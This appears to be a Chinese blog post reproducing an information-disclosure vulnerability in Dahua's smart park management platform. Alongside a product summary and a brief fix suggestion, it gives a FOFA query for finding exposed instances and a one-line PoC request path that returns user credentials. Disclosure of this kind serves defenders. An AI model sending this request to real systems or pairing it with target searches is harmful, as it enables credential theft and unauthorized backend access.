【漏洞复现】大华智慧园区综合管理平台信息泄露漏洞

Nx01 产品简介

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

Nx02 漏洞描述

大华智慧园区综合管理平台存在信息泄露漏洞,攻击者通过此漏洞获取用户名及密码进行后台登陆。

Nx03 产品主页

fofa-query: app.name="Dahua 大华 智慧园区管理平台"

Nx04 漏洞复现

POC:

复制代码
/admin/user_getUserInfoByUserName.action?userName=system

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
落笔画忧愁e6 小时前
扣子Coze飞书多维表插件添加数据记录
java·服务器·飞书
Two_brushes.8 小时前
【linux 网络】网络基础
linux·网络
Code Warrior8 小时前
【Linux】基础开发工具(3)
linux·服务器
小安运维日记10 小时前
CKS认证 | Day4 最小化微服务漏洞
安全·docker·微服务·云原生·容器·kubernetes
Two_brushes.10 小时前
【linux网络】网络编程全流程详解:从套接字基础到 UDP/TCP 通信实战
linux·开发语言·网络·tcp/udp
夕泠爱吃糖11 小时前
Linux中的静态库和动态库
linux·运维·服务器
Vic1010111 小时前
Java 开发笔记:多线程查询逻辑的抽象与优化
java·服务器·笔记
Bruce_Liuxiaowei11 小时前
安全分析:Zabbix 路径探测请求解析
安全·网络安全·zabbix
weixin_4723394612 小时前
网络安全核心技术解析:权限提升(Privilege Escalation)攻防全景
安全·web安全
武汉唯众智创12 小时前
高职院校“赛岗课”一体化网络安全实战类人才培养方案
网络·安全·web安全·网络安全·“赛岗课”一体化·赛岗课